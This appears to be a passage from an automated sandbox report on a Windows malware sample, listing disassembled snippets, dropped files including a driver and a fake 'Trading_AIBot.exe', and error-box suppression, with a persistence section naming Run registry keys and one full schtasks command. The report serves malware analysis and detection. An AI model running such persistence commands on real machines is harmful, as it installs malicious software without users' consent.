                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C372D7 push FFFFFFC3h; ret 6_2_02C37316
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C372D7 push FFFFFFC3h; ret 6_2_02C37372
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C5C2FC push 02C5C367h; ret 6_2_02C5C35F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C332FC push eax; ret 6_2_02C33338
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C3728F push FFFFFFC3h; ret 6_2_02C372B6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C432AF push FFFFFFC3h; ret 6_2_02C432E6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C432AF push FFFFFFC3h; ret 6_2_02C4333E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C43257 push 8402C336h; ret 6_2_02C431F9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C43257 push FFFFFFC3h; ret 6_2_02C432E6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C37223 push FFFFFFC3h; ret 6_2_02C372B6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C37233 push FFFFFFC3h; ret 6_2_02C3725A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C37393 push FFFFFFC3h; ret 6_2_02C37426
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C3635A push 02C363B7h; ret 6_2_02C363AF
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C3635C push 02C363B7h; ret 6_2_02C363AF
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C43307 push 8402C336h; ret 6_2_02C432A9
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C43307 push FFFFFFC3h; ret 6_2_02C4333E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C37337 push FFFFFFC3h; ret 6_2_02C37316
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C37337 push FFFFFFC3h; ret 6_2_02C37372
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C3708B push FFFFFFC3h; ret 6_2_02C37092
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C4308F push 02C43041h; ret 6_2_02C43039
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C5C0AC push 02C5C125h; ret 6_2_02C5C11D
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C371C7 push FFFFFFC3h; ret 6_2_02C3725A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C371C7 push FFFFFFC3h; ret 6_2_02C372B6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C5C1F8 push 02C5C288h; ret 6_2_02C5C280
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C5C144 push 02C5C1ECh; ret 6_2_02C5C1E4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C486C0 push 02C48702h; ret 6_2_02C486FA
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C396E0 pushfd ; ret 6_2_02C396E3
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C396AE pushfd ; ret 6_2_02C396AF
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C36740 push 02C36782h; ret 6_2_02C3677A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C3673E push 02C36782h; ret 6_2_02C3677A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C3C4F4 push ecx; mov dword ptr [esp], edx6_2_02C3C4F9

                      Persistence and Installation Behavior

                      barindex
                      Command shell drops VBS files
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\x.vbsJump to behavior
                      Drops PE files with a suspicious file extension
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\Oupzhkpr.PIFJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\rpkhzpuO.pifJump to dropped file
                      Sample is not signed and drops a device driver
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFFile created: C:\Windows \SysWOW64\truesight.sys
                      Source: C:\Windows\System32\cscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\Oupzhkpr.PIFJump to dropped file
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile created: C:\Users\user\AppData\Local\Temp\Microsofts.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\rpkhzpuO.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OupzhkprJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OupzhkprJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C4A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_02C4A95C
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
